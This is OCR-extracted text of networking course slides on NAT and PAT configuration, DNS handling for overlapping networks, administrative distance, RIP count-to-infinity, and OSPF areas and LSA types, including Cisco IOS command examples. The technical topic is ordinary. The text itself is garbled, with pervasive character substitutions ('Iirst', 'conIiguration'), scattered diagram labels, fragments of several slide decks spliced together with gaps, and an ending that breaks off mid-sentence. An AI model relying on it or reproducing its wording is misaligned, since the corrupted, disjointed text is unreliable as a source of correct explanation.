10.1.1.1
NAT
198.5.5.55
193.9.9.99
10.1.1.1 193.9.9.1
10.1.1.2 193.9.9.2
.... ....
Inside Local IP Inside Global IP 10.1.1.2
Simple NAT Table
1) Suppose the user at host 10.1.1.1 opens a connection to host 198.5.5.55.
2) The Iirst packet that the router receives Irom host 10.1.1.1 causes the router
to check its NAT table.
3) The router replaces the source address with the inside global address Iound
in the NAT table. II no translation entry exists, the router determines that
the source address must be translated dynamically and selects a legal global
address Irom the predefined dynamic address pool and creates a translation
entry.
Note: static versus dvnamic entries.
Example Ior a static conIiguration:
ip nat inside source static 10.1.1.1 193.9.9.1
interface ethernet 0
ip address 10.1.1.99 255.0.0.0
ip nat inside
interface serial 0
ip address 193.9.9.99 255.255.255.0
ip nat outside
10
10 {C} Herbert Haas 2005/03/11
Basic PrincipIe (1b)
10.1.1.1 193.9.9.1
10.1.1.2 193.9.9.2
.... ....
Inside Local IP Inside Global IP
10.1.1.1
198.5.5.55 DA
SA 193.9.9.1
198.5.5.55 DA
SA
10.1.1.1
NAT
198.5.5.55
193.9.9.99
10.1.1.2
NAT
Simple NAT Table
In many NAT implementations the host portion oI an IP address remains
unchanged. Only the preIix is translated.
Example Ior a dvnamic conIiguration:
ip nat pool mynatconf 193.9.9.1 193.9.9.254 netmask 255.255.255.0
ip nat inside source list 1 pool mynatconf
!
interface ethernet 0
ip address 10.1.1.99 255.0.0.0
ip nat inside
!
interface serial 0
ip address 193.9.9.99 255.255.255.0
ip nat outside
!
access-list 1 permit 10.0.0.0 0.255.255.255
11
11 {C} Herbert Haas 2005/03/11
Basic PrincipIe (1c)
10.1.1.1 193.9.9.1
10.1.1.2 193.9.9.2
.... ....
Inside Local IP Inside Global IP
Simple NAT Table
10.1.1.1
198.5.5.55
DA
SA
193.9.9.1
198.5.5.55
DA
SA
10.1.1.1
NAT
198.5.5.55
193.9.9.99
10.1.1.2
NAT
1) Host 198.5.5.55 responds to host 10.1.1.1 by using the inside global
address 193.9.9.1 as destination address.
2) When the router receives a packet with the inside global address 193.9.9.1
it perIorms a NAT table lookup to determine the associated inside local
address.
3) The router translate 193.9.9.1 to 10.1.1.1 and Iorwards the packet to host
10.1.1.1.
FYI:
Inside-to-outside translation occurs aIter routing
Outside-to-inside translation occurs beIore routing
12
12 {C} Herbert Haas 2005/03/11
Basic PrincipIe (2a)
10.1.1.1
NAT
NAT
10.1.1.1
198.5.5.55
198.5.5.1
10.1.1.1 has
global address
193.9.9.1
10.1.1.1 has
global address
198.5.5.1
193.9.9.99
In this example we assume that the PC in the leIt network wants to send an IP
packet to the PC in the right network. Note that both networks use NAT.
Outside is everything between the two NAT-enabled routers.
By accident they use the same inside-local addresses. But this does not matter
anyway. You can also imagine using two completely diIIerent inside-local
addresses.
13
13 {C} Herbert Haas 2005/03/11
NAT
Basic PrincipIe (2b)
10.1.1.1
NAT
NAT
10.1.1.1
10.1.1.1
198.5.5.1 DA
SA 193.9.9.1
198.5.5.1 DA
SA 193.9.9.1
10.1.1.1 DA
SA
198.5.5.55 193.9.9.99
NAT
Observe these translations as depicted above:
1) The leIt host (10.1.1.1) send a packet to the right host (also 10.1.1.1). OI
course the right host is known by its outside-local address (198.5.5.1),
which is used as destination address.
2) The leIt NAT-enabled router translates only the source address (which was
an inside-local address) to an inside-global address (193.9.9.1). The
destination address (which is an outside-local address) remains unchanged
and is now called outside-global, while the packet traverses the Internet.
3) The right NAT-enabled router only changes the destination address (which
he regards as inside-global) by translating it to an inside-local one. The
source address is regarded as outside-global and remains unchanged but is
now called outside-local.
14
14 {C} Herbert Haas 2005/03/11
OverIoading (PAT)
Common problem:
Many-to-one Translation
Aka "PAT"
Many-to-one translation is acomplished by identiIying each traIIic according to
the source port numbers. This method is commonly known as Port Address
Translation (PAT). In the IETF documents you will also see the abbreviation
NAPT. In the Linux world it is known as masquerading.
When N inside hosts use the same source port numbers, the PAT-routers will
increase N-1 oI these identical source port numbers to the next Iree values.
15
15 {C} Herbert Haas 2005/03/11
OverIoading ExampIe (1)
PAT
10.1.1.1:1034
65.38.12.9:80 DA
SA
10.1.1.1
10.1.1.2
10.1.1.2:2138
65.38.12.9:80 DA
SA
173.3.8.1:1034
65.38.12.9:80 DA
SA
173.3.8.1:2138
65.38.12.9:80 DA
SA
65.38.12.9
10.1.1.1:1034
10.1.1.2:2138
173.3.8.1:1034
173.3.8.1:2138
65.38.12.9:80
65.38.12.9:80
65.38.12.9:80
65.38.12.9:80
Extended Translation Table
Outside Local Inside Global Inside Local Outside Global
TCP
TCP
Prot.
The port number is the diIIerentiator. Note that the TCP and UDP port number
range allows up to 65,536 number per IP address. This number is the upper
limit Ior simultaneous transmissions per inside-global IP address.
II the port numbers run out, PAT will move to the next IP address and try to
allocate the original source port again. This continues until all available ports
and IP addresses are utilized. II a PAT router run out oI addresses, it drops the
packet and sends an ICMP Host Unreachable message.
Generally, NAT/PAT is only practical when relatively Iew hosts in a stub
domain communicate outside oI the domain at the same time. In this case, only
a small subset oI the IP addresses in the own domain must be translated into
globally unique IP addresses.
16
16 {C} Herbert Haas 2005/03/11
PAT
10.1.1.1:1034
65.38.12.9:80
DA
SA
10.1.1.1
10.1.1.2
10.1.1.2:2138
65.38.12.9:80
DA
SA
173.3.8.1:1034
65.38.12.9:80
DA
SA
173.3.8.1:2138
65.38.12.9:80
DA
SA
65.38.12.9
OverIoading ExampIe (2)
Extended Translation Table
10.1.1.1:1034
10.1.1.2:2138
173.3.8.1:1034
173.3.8.1:2138
65.38.12.9:80
65.38.12.9:80
65.38.12.9:80
65.38.12.9:80
Outside Local Inside Global Inside Local Outside Global
TCP
TCP
Prot.
In this example both inside hosts (10.1.1.1 and 10.1.1.2) connect to the same
outside webserver. The outside local addresses are mostly identical to the
outside global addresses, but in some situations we might want to translate
them also (see next slides Ior examples).
The dynamic translation table (or translation matrix) ages out aIter some time.
The deIault timeouts are:
Non-DNS UDP 5 minutes (ip nat translation udp-timeout <seconds>)
DNS 1 minute (ip nat translation dns-timeout <seconds>)
TCP 24 hours (ip nat translation tcp-timeout <seconds>)
TCP RST/FN 1 minute (ip nat translation finrst-timeout <seconds>)
II overloading is not conIigured the timeout period is 24 hours per deIault.
(ip nat translation timeout <seconds>)
Above ConIiguration:
ip nat pool mypool 173.3.8.1 173.3.8.5 netmask 255.255.255.0
ip nat inside source list 1 pool mypool overload
interface ethernet 0
ip address 10.1.1.99 255.0.0.0
ip nat inside
interface serial 0
ip address 173.3.8.9 255.255.255.0
ip nat outside
access-list 1 permit 10.0.0.0 0.255.255.255
17
17 {C} Herbert Haas 2005/03/11
OverIapping Networks
= Same addresses are used
locally and globally
What can
happen?
Overlapping networks occur iI we use non-legal (not oIIicially assigned) IP
addresses that oIIicially belong to another network. We can do that iI we use
NAT to translate our internal addresses into global ones. However, iI we want
to communicate with the other network (that use our inside-local addresses as
global ones) we must consider some special issues...
18
18 {C} Herbert Haas 2005/03/11
Outside Address TransIation
9.3.1.2
193.9.9.2
x.x.x.x DA
SA
Hidden 9.0.0.0
network
9.3.1.8
193.9.9.2 DA
SA
Packet came Irom
"true" 9.0.0.0
network
10.0.0.8
9.3.1.2 DA
SA
9.3.1.8
First we examine the simple case. Suppose we used a class A network 9.0.0.0
Ior several years and now we want to give it back to the world (thereby earning
a lot oI money Irom our ISP).
Now we will present our network through NAT to the outside world.
Obviously the class A range we had given away will be used by other
customers, so incoming packets might have the same source addresses as we
still use Ior our devices. Clearly we should renumber our hosts with RFC1918
private addresses.
But iI we had a big number oI hosts we might not want to renumber all
devices, instead we will translate the source addresses oI incoming packets iI
they come Irom the true class-A network 9.0.0.0. By changing to an outside-
local address, these packets can be routed outside.
19
19 {C} Herbert Haas 2005/03/11
DNS ProbIem (1)
5.1.2.3
"1ahoo"
5.1.2.10
DNS server
195.44.33.11
DNS request for host "1ahoo"
SA5.1.2.3 / DA195.44.33.11
Hidden 5.1.2.0/24
network
Legal 5.1.2.0/24
network
This is a more tricky issue. Usually we do not know IP addresses oI outside
hosts, rather we ask a DNS server Ior name resolution.
20
20 {C} Herbert Haas 2005/03/11
DNS ProbIem (2)
5.1.2.3
"1ahoo"
5.1.2.10
DNS server
195.44.33.11
DNS request for host "1ahoo"
SA178.12.99.3 / DA195.44.33.11
21
21 {C} Herbert Haas 2005/03/11
DNS ProbIem (3)
5.1.2.3
"1ahoo"
5.1.2.10
DNS server
195.44.33.11
DNS reply: host "1ahoo" is 5.1.2.10
SA195.44.33.11 / DA 178.12.99.3
!OVERLAPPING ALERT!
We cannot tell our hosts
that "1ahoo" has IP address 5.1.2.10...
They would think that 1ahoo is inside
and would try a direct delivery...!!!
But what, iI the DNS server replies an IP address which is supposed to be
inside our own network? In this case the NAT router must manipulate the
layer-7 DNS inIormation and translate the global-outside addresses.
22
22 {C} Herbert Haas 2005/03/11
DNS ProbIem (4)
5.1.2.3
"1ahoo"
5.1.2.10
DNS server
195.44.33.11
DNS reply: host "1ahoo" is 9.9.9.9
SA 195.44.33.11 / DA5.1.2.3
Now my hosts must
ask me
where 9.9.9.9 is...
The router examines every DNS reply, ensuring that the resolved address is not
used inside. In such overlapping situations the router will translate the address.
Note:
Cisco NAT is able to inspect and perIorm address translation on A (Address)
and PTR (Pointer) DNS Resource Records.
23
23 {C} Herbert Haas 2005/03/11
DNS ProbIem (5)
5.1.2.3
"1ahoo"
5.1.2.10
DNS server
195.44.33.11
Message for host "1ahoo"
SA5.1.2.3 / DA9.9.9.9
DA9.9.9.9...?
Must be translated
OI course iI the destination address oI outgoing packets match a previously
introduced outside-local address, it must be translated into a outside-global
address.
The same perIormance is done in a converse situation where the DNS server is
inside and a DNS request is sent by an outside host. II the name resolution
result in an inside local address the NAT router has to translate this address.
NOTE: Cisco IOS does not translate addresses inside DNS zone transIers.
24
24 {C} Herbert Haas 2005/03/11
DNS ProbIem (6)
5.1.2.3
"1ahoo"
5.1.2.10
DNS server
195.44.33.11
Message for host "1ahoo"
SA195.44.33.11 / DA5.1.2.10
5.1.2.3 195.44.33.11 5.1.2.10 9.9.9.9
Inside Local Inside Global Outside Global Outside Local
NAT
Table
To prepare our router Ior overlapping addresses we use either a static or a
dynamic conIiguration.
Static: (rest is similar as in previous examples)
ip nat outside source static 5.1.2.10 9.9.9.9
Dynamic:
ip nat pool insidepool 195.44.33.11 195.44.33.13 netmask 255.255.255.0
ip nat pool outsidepool 9.9.9.1 9.9.9.255 prefix-length 24
ip nat inside source list 1 pool insidepool
ip nat outside source list 1 pool outsidepool
!
interface ethernet0
ip address 5.1.2.99 255.0.0.0
ip nat inside
!
interface serial0
ip address 195.44.33.99 255.255.255.0
ip nat outside
!
access-list 1 permit 5.1.2.0 0.0.0.255
25
25 {C} Herbert Haas 2005/03/11
TCP Load Sharing (1)
MuItipIe servers represented by a
singIe inside-gIobaI IP address
Rotary group
TCP load sharing is an enhanced NAT Ieature and is used inside the Intranet
because this has nothing to do with private address translation. II we want to
oIIer a highly loaded speciIic service to users, we can employ a NAT router to
map a single inside-global address (the virtual host address which is known to
the users) to multiple inside-local addresses, each assigned to a real host.
Everytime a user connects to the virtual host and wants to establish a session,
this session is mapped to one oI the real hosts in a round-robin manner. That is
why the group oI real hosts is called "rotary group".
Note that the NAT router has no idea oI the load distribution. Neither the
service availability is known to the router!
32
32 {C} Herbert Haas 2005/03/11
NAT and FTP
FTP controI session negotiates port
numbers
MaiIfiIters etc.
Encrypted L3 payIoad must not
contain address/port information
Some NAT routers perIorm stateIul packet inspection (SPI), which allows
NAT devices to Iilter harmIul packets such as SYN-Iloods. SPI is merely a
marketing term meaning enhanced Iirewalling Ieatures.
NAT cannot translate payload address inIormation iI the payload is encrypted.
Secure Socket Layer (SSL) and Secure Shell (SSH) are implemented as
encrypted TCP payload but the TCP head is not encrypted. Thus, NAT can
deal with SSL and SSH without problems. On the other hand, problems may
occur with Kerberos, X-Windows, Session Initiation Protocol (SIP), remote
shell (RSH), and others NAT-sensitive protocols.
37
37 {C} Herbert Haas 2005/03/11
Drawbacks of NAT
TransIation is ressource intensive (deIays)
Encrypted protocoIs cannot be transIated
Increased probabiIity of mis-addressing
Might not support aII appIications
Hiding hosts might be a negative effect
ProbIems with SNMP, DNS, ...
Ressource demand means, the traIIic matrix requires lots oI RAM while
augmented protocol handling requires CPU power.
Each NAT session consumes about 160 bytes in DRAM (using Cisco IOS).
From this we conclude that 10,000 translations would consume 1.6 MB.
Mis-addressing occurs as the administrator is responsible Ior a proper NAT
conIiguration.
SNMP traIIic is not supported by Cisco IOS NAT because oI the MIB-
dependent style oI SNMP packets.
38
38 {C} Herbert Haas 2005/03/11
Configuration Commands (1)
DecIare interfaces to be
inside/outside
ip nat { inside | outside }
Define a pooI of addresses (gIobaI)
ip nat pool <name> <start-ip>
<end-ip> { netmask <netmask>
| prefix-length <prefix-
length> } [ type { rotary } ]
Note that a pool oI addresses must only be deIined Ior dynamic translation.
II you plan to employ static translation only you can skip the second command.
39
39 {C} Herbert Haas 2005/03/11
Configuration Commands (2)
EnabIe transIation of inside source
addresses
ip nat inside source { list <acl> pool <name>
[overload] | static <local-ip> <global-ip> }
EnabIe transIation of inside destination
addresses
ip nat inside destination { list <acl> pool
<name> | static <global-ip> <local-ip> }
EnabIe transIation of outside source
addresses
ip nat outside source { list <acl> pool <name>
| static <global-ip> <local-ip> }
Packets Irom addresses that match those on the simple access-list are translated
dvnamicallv using the previously deIined address pool. The keyword
|overload| enables PAT. The access list must permit only those addresses that
are to be translated.
Inside destination address translation should use addresses Irom a previously
deIined rotarv pool. A destination address (oI an incoming packet) matching
the access list will be replaced with an address oI the rotary pool in a round-
robin manner. See the previous section about TCP load sharing.
Outside source address translation is necessary Ior overlapping networks. See
the corresponding previous section.
40
40 {C} Herbert Haas 2005/03/11
CIearing Commands
Clear all dynamic NAT table entries
clear ip nat translation *
Clear a simple dynamic inside or inside+outside
translation entry
clear ip nat translation inside <global-ip>
<local-ip> [outside <local-ip global-ip>]
Clear a simple dynamic outside translation entry
clear ip nat translation outside <local-ip>
<global-ip>
Direct DeIivery
Indirect DeIivery
Static Routing
DefauIt Routing
Dynamic Routing
Hop count
Can be changed
II several diIIerent routing protocols suggest diIIerent paths to the same
destination at the same time, the router makes a trustiness decision based on the
"Administrative Distance", which is a Cisco Ieature. Each routing protocol has
assigned a static AD value indicating the "trustiness" the lower the better. OI
course these values can be manipulated Ior special purposes.
25
25 {C} Herbert Haas 2005/03/11
Administrative Distances Chart
RIP
OSPF
IGRP
I-EIGRP
E-BGP
I-BGP
E-EIGRP
EGP
IS-IS
EIGRP Summary Route
Static route to next hop
Static route through interface
DirectIy Connected
Unknown
120
110
100
90
20
200
170
140
115
5
1
0
0
255
Note the diIIerence between static routes, iI the next hop either points to an
interIace (AD1) or iI the route is conIigured as directly connected (AD0)
AD also tells the router that E-BGP updates are more trustworthy than I-BGP
messages.
26
26 {C} Herbert Haas 2005/03/11
Remember
1) Using the METRIC one routing protocoI determines the
best path to a destination.
2) A router running muItipIe routing protocoIs might be toId
about muItipIe possibIe paths to one destination.
3) Here the METRIC cannot heIp for decisions because different
type of METRICS cannot be compared with each other.
4) A router chooses the route which is proposed by the
routing protocoI with the lowest ADMINISTRATIVE DISTANCE
27
27 {C} Herbert Haas 2005/03/11
AD with Static Routes
Each static route can be given a different
administrative distance
This way faII-back routes can be
configured
DiaIup ISDN
AD = 5
AD = 10
AD = 20
In the example above, there are several static routes to same destination. There
are three paths with diIIerent quality (more or less hops, BW, ...). So every path
has assign a diIIerent AD. II there are problems with the main path (AD 5) the
router automatically change to the next path (AD 10) and so on.
28
28 {C} Herbert Haas 2005/03/11
CIassification
Depending on age:
Signpost principIe
Loops can occur!
AdditionaI mechanisms needed:
Triggered update
HoId down
ExampIes: RIP, RIPv2, IGRP (Cisco)
Routing loops are big problems with distance vector protocols. Because oI the
simple principle oI Distance Vector protocols, we cannot prevent rooting loops.
Access Lists, Disconnection and connections, Router malIunction, etc can always
lead to it, there is no 100 solution.
31
31 {C} Herbert Haas 2005/03/11
Link State (1)
Each two neighbored routers
estabIish adjacency
Routers Iearn reaI topoIogy
information
Propagated by flooding
(very fast convergence)
Link-state routing protocol were designed Ior large networks. This kind oI
protocols are more reliable and convergence Iast.
The smallest topological unit is simply the inIormation: ROUTER-LINK-
ROUTER
32
32 {C} Herbert Haas 2005/03/11
Link State (2)
Routing tabIe entries are caIcuIated
by appIying the Shortest Path First
(SPF) aIgorithm on the database
Loop-safe
Distance Vector
Link State
34 {C} Herbert Haas 2005/03/11
Quiz
What are advantages of static
routing?
What are advantages of dynamic
routing?
Why are defauIt routes used to
access the Internet?
Why is the convergence time Iower
with Iink-state routing protocoIs?
1
2005/03/11 {C} Herbert Haas
RIP
Signpost Routing, Version 1
2
2 {C} Herbert Haas 2005/03/11
Routing Information ProtocoI
Interior Gateway ProtocoI (IGP)
Distance-Vector Routing ProtocoI
Destination network
Access Iists
Router maIfunctions
....
During that time, routing Ioops occur!
Because oI the simple principle oI RIP (Distance Vector protocol), we cannot
prevent Count to InIinity. Access Lists, Disconnection and connections, Router
malIunction, etc can always lead to it, there is no 100 solution.
We need a more general approach to avoid that Maximum Hop Count, that's
the only IailsaIe solution.
14
14 {C} Herbert Haas 2005/03/11
Count To Infinity (1)
1.0.0.0 2.0.0.0
3.0.0.0
Router A Router B
e0 s0
s1
s0
s1
s0 s1
e0
e0
Router C
2.0.0.0 ??? ?
NET Hops IF
Router D
s2
4.0.0.0
s0
4.0.0.0 direct e0
NET Hops IF
2.0.0.0 2 s0
. . . . . . . .
e0
. . . . . . . . .
Lets us look to another example where Count to InIinity is approaching. Although
Split Horizon is implemented !
We have a network with 4 routers, suddenly net 2 crash.
15
15 {C} Herbert Haas 2005/03/11
Count To Infinity (2)
1.0.0.0
3.0.0.0
Router A Router B
e0 s0
s1
s0
s1
s0 s1
e0
Router C
2.0.0.0 3 s2
NET Hops IF
Router D
s2
4.0.0.0
s0
4.0.0.0 direct e0
NET Hops IF
2.0.0.0 2 s0
. . . . . . . .
e0
s1
s2
. . . . . . . . .
2.0.0.0 3
NET Hops
DA=, SA=D
. . . . . . .
And a new connection established between router B and router D. Now, a normal
routing update is send Irom router D to router B (with inIormation about net 2, oI
course).
16
16 {C} Herbert Haas 2005/03/11
Count To Infinity (3)
1.0.0.0
3.0.0.0
Router A Router B
e0 s0
s1
s0
s1
s0 s1
e0
Router C
2.0.0.0 3 s2
NET Hops IF
Router D
s2
4.0.0.0
s0
4.0.0.0 direct e0
NET Hops IF
2.0.0.0 5 s0
. . . . . . . .
e0
s1
s2
. . . . . . . . .
2.0.0.0 4
NET Hops
DA=, SA=B
. . . . . . .
2.0.0.0 4
NET Hops
DA=, SA=B
. . . . . . .
2.0.0.0 5
NET Hops
DA=, SA=C
. . . . . . .
Router B doesn`t know where network 2 is gone. So he sends inIormation about
network 2 (increasing hop count by 1) to every neighbor router.
17
17 {C} Herbert Haas 2005/03/11
Count To Infinity (4)
1.0.0.0
3.0.0.0
Router A Router B
e0 s0
s1
s0
s1
s0 s1
e0
Router C
2.0.0.0 6 s2
NET Hops IF
Router D
s2
4.0.0.0
s0
4.0.0.0 direct e0
NET Hops IF
2.0.0.0 5 s0
. . . . . . . .
e0
s1
s2
. . . . . . . . .
2.0.0.0 6
NET Hops
DA=, SA=D
. . . . . . .
Count to Infinity situations cannot be avoided in
any situation (drawback of signpost principIe)
Basic soIution: Maximum Hop Count = 16
Count to inIinity accurse. Only the maximum Hop Count, the basic solution, can
stop this problem.
18
18 {C} Herbert Haas 2005/03/11
Maximum Hop Count = 16
1.0.0.0 2.0.0.0
3.0.0.0
Router A Router B
e0 s0
s1
s0
s1
s0 s1
e0
e0
Router C
Router D
s2
4.0.0.0
s0
e0
s1
s2
Upon network faiIure, the route is marked as INVALID (hop count 16) and propagated.
1
2.0.0.0 16 -
NET Hops IF
. . . . . . . .
2
2.0.0.0 16
NET Hops
DA=, SA=B
. . . . . . .
2.0.0.0 16
NET Hops
DA=, SA=B
. . . . . . .
2.0.0.0 16
NET Hops
DA=, SA=B
. . . . . . .
3
3
3
4.0.0.0 direct e0
NET Hops IF
2.0.0.0 16 -
. . . . . . . . .
2.0.0.0 16 -
NET Hops IF
. . . . . . . .
2.0.0.0 16 -
NET Hops IF
. . . . . . . .
4
4
4
AIter 16 Hops the Net 2 is now marked as invalid.
OI course, this unreachabilty-inIormation would be propagated deeper into the
network iI there are additional routers.
19
19 {C} Herbert Haas 2005/03/11
Maximum Hop Count
Defining a maximum hop count of 16
provides a basic safety factor
But restricts the maximum network
diameter
Routing Ioops might stiII exist during
480 seconds (1630s)
Therefore severaI other measures
necessary
The maximum hop count is a basic saIety Iactor, but it is also the main drawback
oI RIP. It restrict the maximum network diameter, and the rooting loops exist Ior
480 seconds. During Count to InIinity there is a bad routing and the network must
deal with unnecessary traIIic. So we need other measures like Poison Reverse.
20
20 {C} Herbert Haas 2005/03/11
AdditionaI Measures
SpIit Horizon
ExternaI timer
SpIit Horizon
Poison Reverse
HoId Down
CIassIess, SIow, SimpIe
34 {C} Herbert Haas 2005/03/11
Quiz
How couId sIower gateways/Iinks be
considered for route caIcuIation
WouIdn't TCP be more reIiabIe than
UDP?
Does maximum hop-count mean that
I can onIy have 15 net-IDs ?
1
2005/03/11 {C} Herbert Haas
RIP Version 2
The Classless Brother
2
2 {C} Herbert Haas 2005/03/11
Why RIPv2
Need for subnet information and VLSM
Need for Next Hop addresses for each
route entry
Need for externaI route tags
Need for muIticast route updates
RFC 2453
Because Subnetting and VLSM get more important RIPv2 was created. RIPv2
was introduced in RFC 1388, "RIP Version 2 Carrying Additional InIormation",
January 1993. This RFC was obsolete in 1994 by RFC 1723 and Iinally RFC
2453 is the Iinal document about RIPv2.
In comparison with RIPv1 the new RIPv2 also support several new Ieatures such
as, routing domains, route advertisements via EGP protocols or authentication.
3
3 {C} Herbert Haas 2005/03/11
MuIticast Updates
RIPv1 used DA=broadcast
UPDATE
INVALID
HOLDDOWN
FLUSH
Same convergence protections
SpIit Horizon
Poison Reverse
HoId Down
RIP is sIow
RIP is unreIiabIe
Designed to be reIiabIe
Yes, RIP is
bad
Voodoo...
OSPF was developed by IETF to replace RIP. In general link-state routing
protocols have some advantages over distance vector, like Iaster convergence,
support Ior lager networks.
Some other Ieatures oI OSPF include the usage oI areas, which makes possible a
hierarchical network topologies classless behavior,there are no such a problem
like in RIP with discontiguous subnets. OSPF also supports VLSM
and authentication.
4
4 {C} Herbert Haas 2005/03/11
OSPF Background
OSPF is the IGP recommended by the IETF
"Open" means "not proprietary"
Dijkstra's Shortest Path First aIgorithm is
used to find the best path
OSPF's father: John Moy
ProtocoI number 89
Error recovery and session
management is covered by OSPF
itseIf
MuIticast address 224.0.0.5
Ensures stabiIity
SimpIe to manage
It is recommended in OSPF to use the loopback interIaces Ior router ID. You
shold conIigure a loopback interIace Iirst and then start the OSPF process,
otherwise the highest ip address Irom a physical interIace will be taken.
1
2005/03/11 {C} Herbert Haas
OSPF - Areas
Why OSPF Complicated
Part 2
2
'An algorithm
must be seen
to be believed`
DonaId .E. Knuth
3
3 {C} Herbert Haas 2005/03/11
OSPF Areas
To improve performance divide the
whoIe OSPF domain in muItipIe
Areas
Restrict Router LSA and Network
LSA within these Areas
AII areas must be connected to the
so-caIIed "Backbone Area"
"Area 0"
As each link is identiIied by a router LSA in the OSPF database, the total OSPF
routing traIIic increases with the number oI links and thus with the size oI the
network. Also the amount oI network LSA will increase in larger networks. The
basic idea oI OSPF to overcome these limitations is to partition the whole OSPF
domain into smaller "areas". The basic idea is to Iilter router LSAs and network
LSAs on the borders between areas. Network reachabilities Irom outside is
advertised through other LSA types. These details are discussed next.
4
4 {C} Herbert Haas 2005/03/11
ABR
Area 0
Area 1
Area 2 Area 5
Area Border Router (ABR):
Terminates Router LSAs
and Network LSAs
Forwards Network Summary LSAs
Router LSA
Network LSA
LSA 1
LSA 2
L
S
A
1
L
S
A
1
L
S
A
1
L
S
A
2
L
S
A
2
L
S
A
2
LSA 3 Network Summary LSA
L
S
A
3
L
S
A
3
L
S
A
3
L
S
A
3
LSA 3
L
S
A
3
L
S
A
3
L
S
A
3
Note:
Network Summary LSAs
are Distance Vector
updates !!!
ABR
ABR
ABR
TraIIic Irom one area to another area Ilows through dedicated routers only, so
called Area Border Routers (ABRs). The ABRs Iilter Router LSAs and Network
LSAs. Network destinations in other areas are advertised by so-called "Network
Summary LSAs", which carry simple distance-vector inIormation i. e. which
networks can be reached by which ABR.
Actually, we will deal with the Iollowing OSPF router types:
Internal Routers (IR): Has all interIaces inside an area
Backbone Routers (BR): Has at least one interIace in the backbone area
Area Border Routers (ABR): Has interIaces in at least two areas
Autonomous System Boundary Routers (ASBR): Has at least one interIace in a
non-OSPF domain; redistributes external routes into the OSPF domain
ASBRs are discussed next.
5
5 {C} Herbert Haas 2005/03/11
ASBR
Area 0
Area 1
Area 2 Area 5
Router LSA
Network LSA
LSA 1
LSA 2
LSA 3 Network Summary LSA
ABR
ABR
ABR
Autonomous System
Border Router (ASBR)
Imports foreign routes via
AS ExternaI LSA
ASBR
AS ExternaI LSA
ASBR Summary LSA LSA 4
LSA 5
L
S
A
5
L
S
A
5
L
S
A
5
LSA 4
L
S
A
5
L
S
A
4
L
S
A
4
L
S
A
4
L
S
A
4
L
S
A
5
L
S
A
4
L
S
A
5
LSA 5
L
S
A
5
L
S
A
5
L
S
A
5
L
S
A
5
When an ABR receives an
AS ExternaI LSA it emits
ASBR Summary LSAs
to aII routers
An Autonomous System Border Router (ASBR) sends the summary
inIormation about Ioreign networks to OSPF networks, using LSA type 5. On
ASBRs you have to run 2 routing processes: OSPF and some other routing
protocolthe router redistributes routing inIomation between OSPF and other
routing process.
6
6 {C} Herbert Haas 2005/03/11
Stub Area
Area 0
Area 1
Stub
Area 2
Area 5
Router LSA
Network LSA
LSA 1
LSA 2
LSA 3 Network Summary LSA
ABR
ABR
ABR
ASBR
AS ExternaI LSA
ASBR Summary LSA LSA 4
LSA 5
L
S
A
5
L
S
A
5
L
S
A
5
LSA 4
L
S
A
5
L
S
A
4
L
S
A
5
AS ExternaI LSA and
ASBR Summary LSA
are not sent into a
Stub Area
L
S
A
2
L
S
A
1
LSA
3
L
S
A
3
L
S
A
3
L
S
A
3
An ASBR could send a lot oI external routes, tose will be Ilooded into OSPF
network. ABRs propogate this inIormation into other OSPF areas, each router in
the area knows all external links and they are stored in link state database. In
order to reach the external destination, the router still needs to send a packet to
ABR. We can make a database oI internal router smaller, iI we create a stub area.
A stub area means that ABR does not sent an external LSAs into this area, instead
ABR advertises a deIault route (0.0.0.0)
7
7 {C} Herbert Haas 2005/03/11
TotaIIy Stubby Area
Area 0
Area 1
TotaIIy
Stubby
Area 2
Area 5
Router LSA
Network LSA
LSA 1
LSA 2
LSA 3 Network Summary LSA
ABR
ABR
ABR
ASBR
AS ExternaI LSA
ASBR Summary LSA LSA 4
LSA 5
L
S
A
5
L
S
A
5
L
S
A
5
LSA 4
L
S
A
5
L
S
A
4
L
S
A
5
L
S
A
2
L
S
A
1
LSA
3
L
S
A
3
No externaI or
summary LSA
are sent into a
TotaIIy Stubby Area
Cisco Specific
A Ciscos propritary extention to the Stub Area. The ABR will not advertise an
external LSAs, like into a stub area, in addition ABR will not send a summary
LSAs Irom other areas, instead a deIault route is injected into Totally Stubby
area.
8
8 {C} Herbert Haas 2005/03/11
Not So Stubby Area (NSSA)
Area 0
Area 1
NSSA
Area 2
Area 5
Router LSA
Network LSA
LSA 1
LSA 2
LSA 3 Network Summary LSA
ABR
ABR
ABR
ASBR
AS ExternaI LSA
ASBR Summary LSA LSA 4
LSA 5
L
S
A
5
L
S
A
5
L
S
A
5
LSA 4
L
S
A
5
L
S
A
4
L
S
A
5
L
S
A
2
L
S
A
1
LSA
3
L
S
A
3
LSA 7 NSSA ExternaI LSA
L
S
A
3
L
S
A
3
ABR wiII transIate the Type 7
LSA into a Type 5 LSA onIy
if the Type 7 LSA has
the P-bit set to 1
LSA 7
L
S
A
7
ASBR advertizes routes
of another routing
domain via NSSA
ExternaI LSA
ASBR
L
S
A
5
The NSSA ASBR has the option oI setting or clearing the P-bit in the NSSA
External LSA. II the P-bit is set any ABR will translate this LSA into an AS
External LSA (Type 5).
9
9 {C} Herbert Haas 2005/03/11
Summarization
Efficient OSPF address design requires
hierarchicaI addressing
Address pIan shouId support
summarization at ABRs
Area 0
Area 10
Area 20
Area 30
20.1.0.0/16
...
20.254.0.0/16
21.1.0.0/16
...
21.254.0.0/16
22.1.0.0/16
...
22.254.0.0/16
20/8
2
1
/
8
2
2
/8
Summarization is an other way to keep a router database smaller. The ABR
instead oI sending each single subnet Irom the area, creates a summary route and
advertises it into a diIIerent area. Note that summarization is turned oII by deIault
(i. e. must be explicitly turned on).
10
10 {C} Herbert Haas 2005/03/11
VirtuaI Links
Another way to
connect to area 0
using a point-to-point
unicast tunneI
Transit area must
have fuII routing
information
Generates summary
LSA for network
7.0.0.0/8 into area 1 and
area 0
Increased overhead
In some cases it is not possible to use a virtual link, as a possible solution ap ip
tunnel could be implemented.
14
14 {C} Herbert Haas 2005/03/11
Summary
Area concept supports Iarge
networks
LS type
Link State ID
Advertising Router
The most recent one
of two instances of
the same LSA is
determined by:
LS sequence number
LS checksum
LS age
MaxAgeDiff (15 min)
as toIerance vaIue
Greater
SeqNr
On comparing two LSAs,
the most recent recent one
is that with.
Greater
Checksum
MaxAge SmaIIer Age
Same SeqNr
Same Checksum
AgeDiff >
MaxAgeDiff
One LSA has
MaxAge
AgeDiff <
MaxAgeDiff
Both are
considered
to be
identicaI
Each LSA carries also a 16 bit age value, which is set to zero when originated and
increased by every router during Ilooding. LSAs are also aged as they are held in
each router's database. II sequence numbers are the same, the router compares the
